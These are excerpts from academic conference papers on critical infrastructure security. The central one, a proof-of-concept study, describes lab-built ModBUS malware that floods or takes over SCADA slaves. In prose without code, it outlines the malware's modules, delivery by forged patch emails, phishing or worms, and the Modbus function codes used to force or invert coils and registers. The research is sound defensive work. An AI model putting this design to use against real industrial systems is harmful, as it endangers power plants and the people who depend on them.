References 1. Pires, P.S.M., Oliveira, L.A.H.G.: Security Aspects of SCADA and Corporate Network Interconnection: An Overview. In: Dependability of Computer Systems, DepCoS-RELCOMEX 2006, May 2006, pp. 127–134 (2006) 2. Igure, V.M., Laughter, S.A., Williams, R.D., Brown, C.L.: Security Issues in SCADA Networks. Computer & Security 25(7), 498–506 (2006) 3. Ralston, P.A.S., Graham, J.H., Hieb, J.L.: Cyber Security Risk Assessment for SCADA and DCS Networks. ISA Transactions 46(4), 583–594 (2007) 4. 21 Steps to Improve Cyber Security of SCADA Networks. President’s Critical Infrastructure Protection Board and Department of Energy Report (2002), http://www.oe.netl.doe.gov/docs/prepare/21stepsbooklet.pdf 5. Fernandez, J.D., Fernandez, A.E.: SCADA Systems: Vulnerabilities and Remediation. Journal of Computing Sciences in Colleges 20(4), 160–168 (2005) 6. Naedele, M.: Addressing IT Security for Critical Control Systems. System Sciences. In: 40th Annual Hawaii International Conference, HICSS 2007, January 2007, p. 115 (2007) 7. Pollet, J.: Developing a Solid SCADA Security Strategy. In: 2nd ISA/IEEE Sensors for Industry Conference, November 2002, pp. 148–156 (2002) 8. Mirkovic, J., Reiher, P., Fahmy, S., Thomas, R., Hussain, A., Schwab, S., Ko, C.: Measuring Denial of Service. Conference on Computer and Communications Security. In: Proceedings of the 2nd ACM Workshop on Quality of Protection, pp. 53–58 (2006) 9. Lan, K., Hussain, A., Dutta, D.: The Effect of Malicious Traffic on the Network. In: Proc. PAM 2003 (April 2003) 10. Sommers, J., Yegneswaran, V., Barford, P.: A Framework for Malicious Workload Generation. In: Proceedings of the 4th ACM SIGCOMM Conference on Internet Measurement, October 2004, pp. 82–87 (2004) 11. Aikat, J., Kaur, J., Smith, F.D., Jeffay, K.: Variability in TCP Round-Trip Times. In: Proceedings of the 3rd ACM SIGCOMM Conference on Internet Measurement Conference, pp. 279–284 (2003) 12. Stevens, W.R.: TCP/IP Illustrated. The Protocols, vol. 1. Addison-Wesley, Reading (1999)
210
T.H. Kobayashi et al.
13. Kobayashi, T.H., Batista Jr., A.B., Brito Jr., A.M., Motta Pires, P.S.: Using a Packet Manipulation Tool for Security Analysis of Industrial Network Protocols. In: IEEE Conference on Emerging Technology and Factory Automation, ETFA 2007, Patras, Greece, September 25-28, pp. 744–747 (2007) 14. Wireshark: Go Deep, http://www.wireshark.org/ 15. CVE-2003-0352. Common Vulnerabilities and Exposures, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0352 16. CVE-1999-0357. Common Vulnerabilities and Exposures, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0357
Scada Malware, a Proof of Concept Andrea Carcano1, Igor Nai Fovino1 , Marcelo Masera1 , and Alberto Trombetta2 1
Institute for the Protection and the Security of the Citizen, Joint Research Centre, European Commission, via E. Fermi 1, Ispra, 21027, VA, Italy 2 Department of Computer Science, University of Insubria, Via H.J. Dunant 3, 21100, Varese, Italy
Abstract. Critical Infrastructures are nowadays exposed to new kind of threats. The cause of such threats is related to the large number of new vulnerabilities and architectural weaknesses introduced by the extensive use of ICT and Network technologies into such complex critical systems. Of particular interest are the set of vulnerabilities related to the class of communication protocols normally known as “SCADA” protocols, under which fall all the communication protocols used to remotely control the RTU devices of an industrial system. In this paper we present a proof of concept of the potential effects of a set of computer malware specifically designed and created in order to impact, by taking advantage of some vulnerabilities of the ModBUS protocol, on a typical Supervisory Control and Data Acquisition system. Keywords: Malware.
1
Security,
SCADA
Systems,
Critical
infrastructures,
Introduction
Security threats are one of the main problems of this computer-based era. All systems making use of information and communication technologies (ICT) are prone to failures and vulnerabilities that can be exploited by malicious software and agents. In the latest years, Industrial Critical Installations started to use massively network interconnections as well, and – what it is worst – they came in “contact” with the public network, i.e. with Internet. The net effect of such new trend, is the introduction of a new interleaved and heterogeneous architecture combining typical information system (e.g. data bases, web-servers, web-applications and web-activities), with real-time elements implementing the control functions of industrial plants. If, from a certain point of view, the advantages of such complex architectures are several (remote management functions, distributed control and management systems, “on the fly monitoring” etc. ), on the other hand they introduce a new layer of exposure to malicious threats. This aspect is not negligible at all when the industrial installation considered fall under the category of Critical Infrastructure1 . Several studies [1] [2] [3] have 1
Critical infrastructure includes any system,asset or service that, if disabled or disrupted in any significant way, would result in catastrophic loss of lives or catastrophic economic loss.
R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 211–222, 2009. c Springer-Verlag Berlin Heidelberg 2009
212
A. Carcano et al.
proved that modern industrial critical infrastructure are, on average, prone to the traditional computer attacks and threats. However, till now, the analyzed and identified scenarios are usually based on traditional ICT threats and attacks, i.e. virus, malwares and attack schema well known in the traditional ICT world (e.g. Nimda, CodeRed, web-server buffer overflows etc.). Even if several of these scenarios have serious effects on the industrial systems, they are not “tailored” for such systems. In this paper we present a proof of concept of the potential effect of a computer malware specifically designed and created in order to impact on a typical Supervisory Control and Data Acquisition system. The paper is organized as follows: in section 2 a brief state of the art the field of critical infrastructure ICT security is presented, while in section 3 we provide some preliminary definition. In section 4 a description of the experimental environment in which we conduced our tests is provided; moreover, section 5 we present extensively the studied malware, the attack scenarios and the experimental results obtained. The conclusion are presented finally in section 6.
2
Related Works
Critical-industrial infrastructures usually adopt network schema which are really tailor-made ad-hoc situations. In the same way, also the communication protocols used, for example, in a typical SCADA Master-Slave architecture, are dedicated, and they constitute a “completely separated world” with its own vulnerabilities and attack patterns, different from the traditional ICT world. In that field, several works have been done. Adam and Byres [4] presented an interesting high level analysis of the possible threats of a power plant system, a categorization of the typical hardware devices involved and some high level discussion about intrinsic vulnerabilities of the common power plant architectures. A more detailed work on the topic of SCADA security, is presented by Chandia, Gonzalez, Kilpatrick, Papa and Shenoi [5]. In this work, the authors describe two possible strategies for securing SCADA networks, underlying that several aspects have to be improved in order to “secure” that kind of architectures. What is evident in primis is that communication protocols used in such systems, (e.g. Modbus, DNP3 etc.) had been not conceived taking into consideration ICT typical threats. Historically, this is due to the fact that when they were designed, the world of industrial control systems was completely isolated from the public networks, and then ICT based intrusion scenarios were considered completely negligible. Some works have been done about the security of such specialized communication protocols: for example, Majdalawieh, Parisi-Presicce and Wijesekera [6] presented an extension of the DNP3 protocol, called DNPsec, which tries to address some of the known security problems of such Master-slave control protocols (i.e. integrity of the commands, authentication, non repudiation etc.). Similar approaches have been presented also by Heo, Hong, Ju, Lim, Lee and Hyun [7] while Mander, Navhani and Cheung [8] presented a proxy filtering solution aiming at identifying and avoiding anomalous control traffic. However, it seems the ICT security in control systems is still, at the moment, an open and
Scada Malware, a Proof of Concept
213
in evolution research field. A relevant role is occupied by field tests. Theoretical analysis, in order to be considered “consistent”, have to be supported by field tests. In the context of Critical Infrastructures, Masera et all [1] [2] presented the results of two field test campaigns in order to study the real effects of a set of well identified attack scenarios against (a) an electric distribution station and (b) a real Power Plant.
3
Preliminary Definitions
In this section we give some preliminary definition related to ICT security and to process control system. This work, is strongly connected with some concepts traditionally derived from the field of computer security, in particular three are the elements of interest that need to be defined: the concepts of Threat, Vulnerability, Attack, As defined in [9] and in the Internet RFC glossary of terms, a Threat is a potential for violation of security, which exists when there is a circumstance, capability, action, or event that could breach security and cause harm. A Vulnerability, by definition [10][11], is a weakness in the architecture design/implementation of an application or a service. Finally, an Attack can be identified as the entire process allowing a Threat Agent to exploit a system by the use of one or more Vulnerabilities. From an architectural point of view, we concentrate our attention on what is known under the acronym of SCADA system (Supervisory Control And Data Acquisition system). Such class of systems, is widely used in industrial systems in order to control and manage field sensors and actuators. While other works [2] concentrated their attention on traditional ICT architectural vulnerabilities, in this paper we focus our efforts on the typical communication protocols used in such systems. In other words, as will be presented in the next section, we want to develop a proof of concept of a malware which, by taking advantage of some vulnerability of such protocols, is able to perpetrate malicious action against the critical system. Such protocols, are normally used by some dedicated servers in order to send commands to the field devices. By using such protocols it is possible, for example, to force a device to open a valve etc. Several are the protocols used (ModBUS, ProfiBUS, DNP3 etc.). For our tests we have taken as example the ModBUS protocol for several reasons, among them: (a) It is widely used, (b) there exist an extensive literature about security flaws of such protocol (see for example [3]). ModBUS is an application layer messaging protocol, positioned at level 7 of the Open Systems Interconnection(OSI) model (in the case of ModBUS over TCP), that provides client/server communication between devices connected on different types of buses or networks. Communications can be (i) query/response type (communication between a master and a slave), or (ii) broadcast response type where the master send a command to all the slaves . A transaction comprises a single query and single response frame or a single broadcast frame. A Modbus frame message contains the address of the intended receiver, the command the receiver must execute and eventually the data needed for the execution of such
214
A. Carcano et al.
command. Modbus/TCP basically embeds a Modbus frame into a TCP frame [12]. All the functions supported by the Modbus protocol are identified by an index number. The ModBUS protocol, as the DNP3 and the ProfiBUS protocol, have been conceived when the subject of ICT security was not relevant for the process control systems. For that reason, when designed, aspects as Integrity, Authentication, no-repudiation etc. were not taken into consideration. More in details, such protocols (a) do not apply any mechanism for checking the integrity of the command packets sent by a master to a slave, (b) do not perform any authentication mechanism between master and slaves and (c) do not apply any anti-repudiation mechanisms to the master. In the next section, in the light of such considerations, we will present some attack scenarios which will take advantage of such lacks.
4
Experimental Environment
In contrast to alternative works which use modeling approaches to reconstruct the underlying network, thanks to a collaboration project with a Power Company, we recreated in a protected environment, as shown in figure 1, the architecture of a typical power plant plus a set of additional infrastructures supporting the implementation of our tests in a systematic and scientific way.
Fig. 1. High level laboratory environment schema
Scada Malware, a Proof of Concept
215
More in detail, such an environment is constituted by: – Power Plant Backbone: it is composed of all the network devices which allow the different subnet of the Power Plant to communicate(3Layer switches, Process Network Firewall, Routers, Internet Firewall. – Field Network: it is the network interconnecting the sensors and the actuators which directly interact with the Power Plant Electro-Mechanic devices. – Process Network: this network hosts all the SCADA systems. By using these systems, the Plant Operators manage the whole Power Plant, sending control commands to such sensors in the Field Network and reading Plant Measurements and Parameters. – Data Exchange Network: this area hosts a set of “data exchange” servers, which receive data from the process network and make them available to the operators which work in the Power Plant Intranet. – Power Plant Intranet: this is the branch of the Company network that provides intranet services to the Power Plant Operators. It is used not only in order to conduct “office work”, but also to keep remotely under control the Power Plant, by accessing, through a VPN(Virtual Private Network) authentication, the DMZ(Demilitarized Zone) and the Process Network of a target Power Plant. – Public Network: this network simulates the “rest of the world” (i.e. Internet). In the latest years, as stated before, several critical infrastructures have started to use, in order to provide new services, the public network as communication channel. For that reason, the simulation of such network, is extremely important in order to analyze possible new attack profiles. – Observer Network: its a network of sensors which is used in order to gather information about the system during the experiments. – Horizontal Services network: it provides the usual feature of backup, disaster recovery etc. – Vulnerability and Attack repositories systems: it contains a set of DataBases and analysis system allowing to analyze the collected data. The whole laboratory environment reproduce all the relevant characteristics of a typical power plant; for example, the windows domain of the Power Plant Intranet, has the same identical security and domain policies of a real one which we had the chance to analyze during our research activity, the Process firewall is the same used by default in the power plants of the power company with which we have collaborated, with the same filtering rules and configurations, etc. Such complex testing architecture, has has allowed us to test attack scenario too complex to be represented in a simulated environment and too heavy to be realized in a “production facility”.
5
Scada Malware and Attack Scenarios
Starting from the considerations we have made in section 3 we identified two possible scenarios in which a “tailod made” malware could be effective and create
216
A. Carcano et al.
serious damages to a critical control system. Since our experimental laboratory is at the moment tailored for recreating the environment of a Power Plant, in the following, we will consider the effects of our attack tests on such kind of systems. As we describe in the following, we concentrate our attention on a particular SCADA protocol, ModBUS, and the malwares we have devoloped, take advantages of some conceptual and architectural vulnerabilities of such protocol. 5.1
ModBUS Malware DoS Scenario
Originally ModBus was conceived in order to be used over serial cable. In such a context, clearly, the risk of external interferences on the communication channel between the master and the slave, were considered practically negligible (at least if we do not consider electromagnetic interferences and physical interruption of the cables). In other words, under such constraints, this closed systems was considered strongly reliable. The porting of the ModBUS protocol over TCP has obviously introduced new layers of complexity in managing the reliable delivery of control packets in an environment strongly real time and, moreover, has opened a new possibility for attackers really motivated in causing damages to the target system. Attack scope. The scope of DoS attack is to desynchronize the communication between Master and Slave and, if possible, completely avoid the communication stream between Master and Slaves. In the light of what presented before, in order damage the control communication stream, it should be sufficient to perform some sort of packet-storm against the Master or the set of slaves of the control system. A generic packet storm generator could be normally identified by some Network Intrusion Detection Sensor, or by some firewall anomaly detection engine. Ideally, if the packet-storm recreates the same “traffic shape” of ModBUS traffic, it should be possible to circumvent the monitoring systems, while reaching the scope of avoiding communication between master and slaves. Attack implementation. We have implemented a particular kind of malware, which, once launched, tries to discover the ModBus slaves connected to the same network of the infected machine, and which starts to send them a huge set of ModBUS packets, trying to overload their network bandwidth. More in detail, this malware is composed of the following logical unit: – A Packet builder, which forges in the proper manner ModBUS over TCP packets. – A Discovery engine, which explores the network in order to identify the IP addresses of the Modbus slaves. – A Packet deliverer, which sends in an optimized way the previously forged packets to the target slaves, in order to saturate the bandwidth as soon as possible. Such a malware, without a proper “infection trigger” is only an optimized Modbus packet generator which have as unique scope sending out a huge number of
Scada Malware, a Proof of Concept
217
packets to all the slaves it is able to identify. Such a malware could be effective only when the attacker is able to launch directly the malicious code on a PC connected directly to the field or to the process network of a SCADA system. This scenario is reasonably acceptable (for example the attacker could be simply a disgruntled employee or operator having a direct access to the control system devices), however it will rarely be the first attack option for an internal attacker. Here below we describe other scenarios which can be used instead by an external attacker. – E-mail based spreading Scenario: Some studies regarding the security policies usually implemented in some Power Companies [2] show how the patching operations of PCs or embedded systems in power plant process networks are “e-mail based”. In other words, a power plant operator receives an e-mail from the ICT-Security team, containing the patching instruction and the patch to be installed; in such scenario the attacker, after gathering information about the hierarchical organization of the ICT security Team, and about the process operators, forges an e-mail identical to the one usually sent for updating purposes (identical not only in the content, but also in term of headers), having attached the previously described malware instead of a normal patch. In such e-mail the attacker asks the operator to install the attached patch on a target Master, or on a PC in the same network. Once installed, the malware will start to deliver massive amount of ModBus packet to the slave, since master and slave will be desynchronized. – Through Phishing Infection: Phishing attacks are typically mounted in one of the following ways: by means of a faked e-mail, displaying a link which seems to point to a legitimate site, but actually linking to a malicious website; or, by poisoning the victim’s DNS server, thus making it possible to transparently connect to the malicious server. Usually the scope of such attacks is to steal the user credentials. We modified slightly such scenario: In our case in fact, the fake web-server contains a set of malicious scripts allowing to download and execute our ModBUS malware on the local machine from which the web-page has been accessed. The scenario develops as follows: (a) By the use of a fake e-mail or by poisoning the DNS of the process network, an operator is forced to visit an ad-hoc created web-site (b) A set of scripts on the web-site, using some well known vulnerabilities of Microsoft Internet Explorer, download and execute of the operator PC the ModBUS malware (c) the legal ModBUS traffic is interrupted. – ModBUS DOS Worm: This sub-scenario is the most relevant we have realized in the context of ModBUS DOS. By using the MalSim Platform [13][14], a platform which uses the Agent paradigm in order to fully reproduce the behavior of a large set of known viruses and worms, we created a set of malwares that uses the infection techniques of some of the most famous viruses (Slammer, Nimda, Codered). Such new worms carry in their payload the code of our ModBUS DOS malware. In this way, every time they infect a new machine, they: (i) start to spread them-selves by using the new host resources, (ii) execute the ModBUS DOS code. The net effect is then the
218
A. Carcano et al.
creation of a first DOS malware, completely indipendent, ad-hoc designed for affecting SCADA systems. Below, the step by step infection evolution of the ModBUS DOS Worm we have implemented: 1. From Internet the worm infects the PCs in the Company Intranet 2. If one of the infected PCs in the Company Intranet open a vpn connection to the Process Network of the Power Plant (this is a common procedure in the remote management policies of a Power Plant), the worm spread itself through such VPN and start to infect the PCs in the process network 3. If the worm discovers ModBus Slaves in the network, it starts to send ModBUS packets in order to desynchronize or completely interrupt the Master/slave Modbus Command flow Experimental Tests. The scenarios described in the previous section have been successfully implemented and tested in our laboratory (we remind here that it recreates with high precision the architecture of a typical Power Plant). In all the presented cases, the final results of the implemented attacks have been the communication interruption between the Modbus Master and slaves. Table 1 and 2 show the delays introduced into the Master/slave communication with the increasing of the bandwidth consumption caused by the ModBUS DOS malware. As it is possible to see, a not negligible factor in the downgrading of the communication performances is played also by some settings of the communication protocol, for example the scanning rate and the connection timeout. Systems with low scanning rate, under attack, tend to be desynchronize faster than systems with high scanning rate (if for example a Master tries to read a slave register with a scanning rate of 1 read every 2000ms, the difference between the real value of the slave register and what the master acquires will grow faster than a situation in which the scanning rate is 1 read every 200ms). A similar observation can be done considering the connection timeout settings. Under attack a system with a low connection timeout will be easily affected by this kind of DOS. The ModBUS DOS worm, resulted obviously the most dangerous of the scenarios presented, in fact, potentially such worm could infect simultaneously more than a PC in the process network, increasing then the average bandwidth consumption and speeding up the network degradation. As final remark of such tests, it is relevant to note that, since the worms created were what it is known in the virology jargon “Zero day worms” (i.e. worms for which have not yet released signatures), and since they perform the attack by using legal ModBUS packets, neither the antiviruses, nor the network intrusion detection system (NIDS) with the standard settings, where able to detect the cause of the attack. 5.2
Modbus Com Worm Scenario
As claimed before, the ModBUS protocol does not provide any security mechanism in order to protect the connections and the data flows. In particular, it
Scada Malware, a Proof of Concept
219
Table 1. Communication degradation during an attack with a master scan rate of 500ms and a connection timeout of 1200ms
SCAN RATE: 500ms CONNECTION TIMEOUT: 1200ms Bitrate
Delay Connection Timeout
43.6 kbits/sec 380ms 81.3 kbits/sec 840ms 99.2 kbits/sec 1120ms
No No No
Table 2. Communication Degradation during an attack with a master scan rate of 200ms and a connection timeout of 500ms
SCAN RATE: 200ms CONNECTION TIMEOUT: 500ms Bitrate
Delay Connection Timeout
43.6 kbits/sec 480ms 81.3 kbits/sec 99.2 kbits/sec -
No Yes Yes
does not provide any authentication and encryption mechanism. When a master sends a packet containing a command to a slave, this one simply executes it without performing any check on the identity of the master and on the integrity of the packet received. With the porting of ModBUS over TCP, this approach has obviously showed all its limits from the security point of view. In fact since the slave can neither verifying the identity of the sender of the commands to be executed nor its integrity, any attacker able to forge ad-hoc modbus packets and having access to the network segment which hosts the slaves, could force them to execute non authorized operations, potentially compromising the stability of the system. If the system is a critical infrastructure like a power plant, the potential damages could be catastrophic. Attack scope. In the light of what claimed before, the scope of the Com Worm attack is to take the control of the slaves of the process control architecture by taking advantage of the lack of authentication and integrity countermeasures of the ModBUS protocol. 5.3
Attack Implementation
We have realized a particular kind of malware, (a variant of the one presented in section 5.1) which, after discovering the ModBus slaves connected to the same
220
A. Carcano et al.
network of the infected machine, start sending them a set of correlated ModBUS packets, in order to put the system in some critical state. More in detail, the malware is composed of the following logical units: – A Packet builder, which forges in the proper manner ModBUS over TCP packets – A Discovery engine, which tries to explore the network in order to identify the Modbus slaves. This information will be used by the following module in order to choose the attack strategy. – A Strategy & analysis module, which, on the basis of the information gathered by the discovery engine and some built-in heuristics identifies the strategy to adopt in order to send packets which could create damages to the system. As the scope of this paper was to prove the feasibility of a SCADA malware, the strategies defined by this module are actually very simple, but of course, potentially it is possible to create very complex and coordinated automatic strategies in order to damage the system – A Packet deliverer, which send the forged packets to the target slaves As in the previous case, also this malware, in order to be effective, needs the support of some “infection trigger” which allows it to reach the process network of target the SCADA system. The scenarios used in section 5.1 (i.e. the e-mail scenario, the phishing scenario and the worm scenario), are valid also in this case. Their description is the same, while changes obviously the Malware code, this time a lot more complex, but, potentially, also a lot more dangerous. Experimental Tests. In our experimental facility (reproducing the architecture of a typical power plant), we have re-created the described scenarios. In all the cases, the malware were able (a) to identify the slaves, (b) to take the control of the target slaves. In particular, as in the previous case, the scenario in which the Malware is “nested” into the code of a worm (we made use also in this case of the Malsim framework [13][14]), were the more effective. In our tests, we proceeded in an incremental manner, creating malware prototypes which were step by step more evoluted: – Step 1 Malware: it replicates the MODBUS function 15 (0x0F), used to force each coil in a sequence of coils to either be ON or OFF in a remote device(salve). The request specifies the coil references to be forced. Coils are addressed starting at 0 to 1999. Close or either open all the coils could have a very high impact in a SCADA system. – Step 2 Malware: it has as target the Input register. Through the function 16 it is able to write a block of contiguous Input registers (1 to 123) in a remote device. This malware does not consider the meaning of the single value but writes in all registers the biggest allowed value: a 16-bit word. – Step 3 Malware: it combines two MODBUS functions: function 01 (0x01) used to read the output values and the function 15 (0x0F) used in the first attack to force a sequence of coils. The strategy adopted was the following: in order to be sure to increase the severity impact of the attack the malware
Scada Malware, a Proof of Concept
221
reads the state of a sequence of coils and then forces the slave to invert the state of all the coils. In other words, the coil configuration is completely changed. By using this approach we have also developed, as described in the previous section, a malware which performs more articulated and coordinated malicious operations on the slaves. It is also important to note that our tests have illustrated how, in order to write an “attack strategy module” with high effectiveness, the attacker has to know at least the high-level details of the architecture of the system under attack.
6
Conclusions
The problem of the security of critical infrastructures, with the massive introduction of ICT systems in the production environment, is nowadays more and more relevant. The current trend, in order to fight against this problem, is to make use of the ICT security countermeasures traditionally used in the “Office Environment”, such as PCs antiviruses, general purpose firewalls etc. In this paper we presented, what is, in our knowledge, the first proof of concept of malware tailored for SCADA systems. During our experimental tests, such malware, by adopting some ad-hoc attack and infection strategies, was able to completely circumvent the traditional ICT security systems, and, in the most evolute version, to take the control of the field sensors and actuators. The impact of similar attacks in the real world, in systems like Power Plants, chemical industries etc. could be dramatic. The use of encrypted channels and authentication mechanisms in the field and process networks, as presented in [6] for the DNP3 protocol, could help in avoiding the interference of infected third parties in a Master/slave communication, but cannot be considered a complete shield when the infected actor is the Master itself. More promising, in our opinion, could be a mixed architecture in which ad-hoc filtering and network monitoring systems, authentication and encryption are mixed together in order to detect and avoid anomalous behaviors. For the future, we plan to use the results of our experimental tests and the testing infrastructure built to support such experiments, in order to study more effective protocols, architectures an policies supporting the identification of and protection against such kind of threats.
References 1. Dondossola, G., Masera, M., Nai Fovino, I., Szanto, J.: Effects of intentional threats to power substation control systems. International Journal of Critical Infrastructure (IJCIS) 4(1/2) (2008) 2. Nai Fovino, I., Masera, M., Leszczyna, R.: ICT Security Assessment of a Power Plant, a Case Study. In: Proceeding of the Second Annual IFIP Working Group 11.10 International Conference on Critical Infrastructure Protection, George Manson University, Arlington, USA (March 2008)
222
A. Carcano et al.
3. Huitsing, P., Chandia, R., Papa, M., Shenoi, S.: Attack Taxonomies for the Modbus Serial and TCP Protocols. In: Proceeding of the Second Annual IFIP Working Group 11.10 International Conference on Critical Infrastructure Protection, George Manson University, Arlington, USA (March 2008) 4. Creery, A., Byres, E.: Industrial Cybersecurity for power system and SCADA networks. IEE Industry Apllication Magazine (July-August 2007) 5. Chandia, R., Gonzalez, J., Kilpatrick, T., Papa, M., Shenoi, S.: Security Strategies for Scada Networks. In: Proceeding of the First Annual IFIP Working Group 11.10 International Conference on Critical Infrastructure Protection, Dartmouth College, Hanover, New Hampshire, USA, March 19-21 (2007) 6. Majdalawieh, M., Parisi-Presicce, F., Wijesekera, D.: Distributed Network Protocol Security (DNPSec) security framework. In: Proceedings of the 21st Annual Computer Security Applications Conference, Tucson, Arizona, December 5-9 (2005) 7. Hong, J.H.C.S., Ho Ju, S., Lim, Y.H., Lee, B.S., Hyun, D.H.: A Security Mechanism for Automation Control in PLC-based Networks. In: Proceedings of the ISPLC 2007. IEEE International Symposium on Power Line Communications and Its Applications, Pisa, Italy, March 26-28, pp. 466–470 (2007) 8. Mander, T., Nabhani, F., Wang, L., Cheung, R.: Data Object Based Security for DNP3 Over TCP/IP for Increased Utility Commercial Aspects Security. In: Proceedings of the Power Engineering Society General Meeting, Tampa, FL, USA, June 24-28, pp. 1–8. IEEE, Los Alamitos (2007) 9. Jones, A., Ashenden, D.: Risk Management for Computer Security: Protecting Your Network & Information Assets. Elsevier, Amsterdam (2005) 10. Alhazmi, O., Malaiya, Y., Ray, I.: Security Vulnerabilities in Software Systems: A Quantitative Perspective. In: Jajodia, S., Wijesekera, D. (eds.) Data and Applications Security 2005. LNCS, vol. 3654, pp. 281–294. Springer, Heidelberg (2005) 11. Bishop, M.: Computer Security Art and Science. Addison Wesley, Reading (2004) 12. http://www.modbus.org/ 13. Leszczyna, R., Nai Fovino, I., Masera, M.: MAlSim. Mobile Agent Malware Simulator. In: Proceeding of the First International Conference on Simulation Tools and Techniques for Communications, Networks and Systems, Marseille (2008) 14. Leszczyna, R., Nai Fovino, I., Masera, M.: Simulating Malware with MAlSim. In: Proceeding of the 17th EICAR Annual Conference 2008, Laval, France (2008)
Testbeds for Assessing Critical Scenarios in Power Control Systems Giovanna Dondossola1 , Geert Deconinck2 , Fabrizio Garrone1 , and Hakem Beitollahi2 1
2
CESI RICERCA, Milano, Italy K.U. Leuven ESAT, Kasteelpark Arenberg 10, 3001 Leuven, Belgium
[email protected] Abstract. The paper presents a set of control system scenarios implemented in two testbeds developed in the context of the European Project CRUTIAL - CRitical UTility InfrastructurAL Resilience. The selected scenarios refer to power control systems encompassing information and communication security of SCADA systems for grid teleoperation, impact of attacks on inter-operator communications in power emergency conditions, impact of intentional faults on the secondary and tertiary control in power grids with distributed generators. Two testbeds have been developed for assessing the effect of the attacks and prototyping resilient architectures. Keywords: power control systems, SCADA systems, grid teleoperation, voltage and frequency control, inter-utility communications, power emergency conditions, cyber security, resilient architectures.
1
Introduction
In the context of the protection of critical information infrastructures, the need of addressing infrastructures owned, operated and used by the power utilities is considered fundamental to the security, economy and quality of life at national and international level [1]. Electricity market liberalisation, energy revolution and technology breakthroughs are three determining factors in the introduction of advanced networked systems for the security and adequacy of modern Electric Power Systems. However networks based on Information and Communication (ICT) technologies create a lot of interdependencies among geographically distributed infrastructures controlled by multiple stakeholders, which motivates research and technology developments able to reduce the cyber risk and to defend power utility infrastructures from intentional and accidental threats. A wide set of control system scenarios has been identified by the CRUTIAL project [2], presenting how dependencies among (segments of) power, control and information infrastructures enable propagation of failures and appearance of cross-cascading and escalading phenomena [3]. Two CRUTIAL testbeds are under development in the CESI RICERCA and K.U.Leuven research laboratories at the aim to assess the ICT system’s vulnerability to plausible cyber attacks and evaluate the resilience of possible architectures/mechanisms/solutions R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 223–234, 2009. c Springer-Verlag Berlin Heidelberg 2009
224
G. Dondossola et al.
to such threats [4]. A subset of CRUTIAL scenarios within both testbeds has been selected for presentation in the present paper, according to the following structure. Section 2 focuses on scenarios related to the DSO (Distribution System Operator) and TSO (Transmission System Operator) teleoperation systems, while section 3 presents scenarios related to control systems for distributed energy resources. Sections 4 and 5 describe both testbeds.
2
Security in Hierarchical Power Control Systems
Two CRUTIAL interdependency scenarios from [2] are presented covering several control systems involved in both manual teleoperations and automatic emergency management of the power grid. 2.1
Communication Security of Grid Teleoperation
The main purpose of this scenario consists in the assessment of the security of the ICT components involved in the teleoperation activities of a DSO operator through the analysis of cross-cascading effects due to threat occurrence in both normal and abnormal power conditions. In general terms a SCADA system for the grid teleoperation is working when it is able to perform its monitoring and control functions. This may happen when the power service is stable (for operational and maintenance needs), but also in abnormal or even emergency conditions. The teleoperation activity includes: – continuous monitoring of substation status: information flows from substation to centre, part on a continuous base (measurements related to active power P, reactive power Q, voltage V and breaker positions) and others (e.g. alarms and status variations) as asynchronous flows. – interventions on the grid configuration (opening/closing breakers, line trips, etc.) due to several needs such as predictive maintenance, DSO contingency management and preventive control requested by the TSO (like rotating load shedding plans and variations in transformer tap changers). The core ICT-systems involved in the supervision and control activities are: the ATC-Area Telecontrol Centres (whose operator’s console is shown in figure 1) controlling the power substations; the substation automation systems connected to their centres through Wide Area Networks (WAN). By following an ongoing trend in the utilities’ communication technology renewal, the information flow supporting DSO teleoperation is transmitted by standard telecom IP backbones owned and operated by external providers who supply virtual, dedicated channels over communication links shared with other customers. From the DSO perspective such a communication infrastructure may be targeted by security threats sourced within the Telco infrastructure. Due to the strong availability requirements on the communication system (availability equal to 0.99999), redundant communication paths are used, implemented over physically independent carrier lines, possibly owned by distinct telecommunication providers. The correct execution of the DSO teleoperation requires the
Testbeds for Assessing Critical Scenarios in Power Control Systems
225
Fig. 1. DSO Operator’s Console
satisfaction of strict refresh time requirements for measurements/alarms and delivery time requirements for commands to the operator. ICT threats that may affect the communication infrastructure range from Denial of Service (DoS) attacks to the telecontrol communications and intrusions into the centre/substation communication flow eventually followed by the execution of faked commands troughs the exploitation of the vulnerabilities of the standard application layer protocols used for monitoring activities and command transmission [2]. DoS attacks to the teleoperation communications, generated by enemies located on the telecom IP backbone are being explored first. Such DoS attack processes to IPv4/IPSEC channels target both DSO centres and substation routers/gateways/firewalls. The identified attack plan includes a sequence of attacks showing the increasing severity of DoS processes starting from the denial of the supervision function and maintenance activities, toward precluding the DSO operator from properly doing the contingency management, towards the denial of the execution of the defence actions in pre-emergency conditions. The simulation of attack processes on the testbed will allow i) to assess the capability of the secure and redundant communication architecture to tolerate the threat hypotheses and evaluate the possible cascading effects in presence of power contingencies; ii) to assess the vulnerabilities of the activities based on standard protocols (e.g. IEC 60870-5-104); iii) to assess the sharing of the same channel for real-time and not real-time activities. The severity of the cascading effects proved in the laboratory testbed is expected to vary depending on i) the grid operating conditions during the ICT attacks ii) the number of substations involved iii) the level of urgency of the teleoperation intervention. In normal conditions, an attack to a single substation site is not expected to lead the power system in a critical status. However if
226
G. Dondossola et al.
the DSO operator is repairing a previous contingency the consequence of the attack may provoke a delay in the duration of the power service interruption. Even worse if the operator’s intervention is aimed at facing with pre-emergency situation occurred in the higher level grid, the impossibility to perform the defence action may lead the whole system into troubles. 2.2
Impact of Attacks on TSO Emergency Management
The realisation of technologically integrated defence plans requires that in emergency conditions the TSO is authorised by the DSO to activate defence actions, consisting in the automatic execution of load shedding activities on the distribution grid. This scenario explores the security of the communications between the TSO and DSO under emergency operating conditions (i.e. overloading of power lines), assessing the possible cross-cascading effects of ICT threats to the communication channels connecting TSO and DSO control centres and substations. The TSO control centre monitors the Electric Power System and elaborates some potentially emergency conditions that could be remedied with opportune load shedding actions applied to particular areas of the grid. In order to actuate the defence actions the TSO centre chooses a subset of HV/MV substations from the list of substations participating to the emergency plan, then sends the requests of preventively arming the automation devices of these substations to the interested DSO area control centres. These requests are delivered through a communication channel among a TSO centre and the interested DSO centres. The DSO centres provide for arming the required substations, and return their status to the TSO centre. In case the potential emergency condition evolves into a real emergency situation, a TSO sentinel device sends the trip command which has to be delivered through the communication network within 600 ms to recover the emergency. It is worth of notice that TSO arm requests are asynchronous with respect to the trip 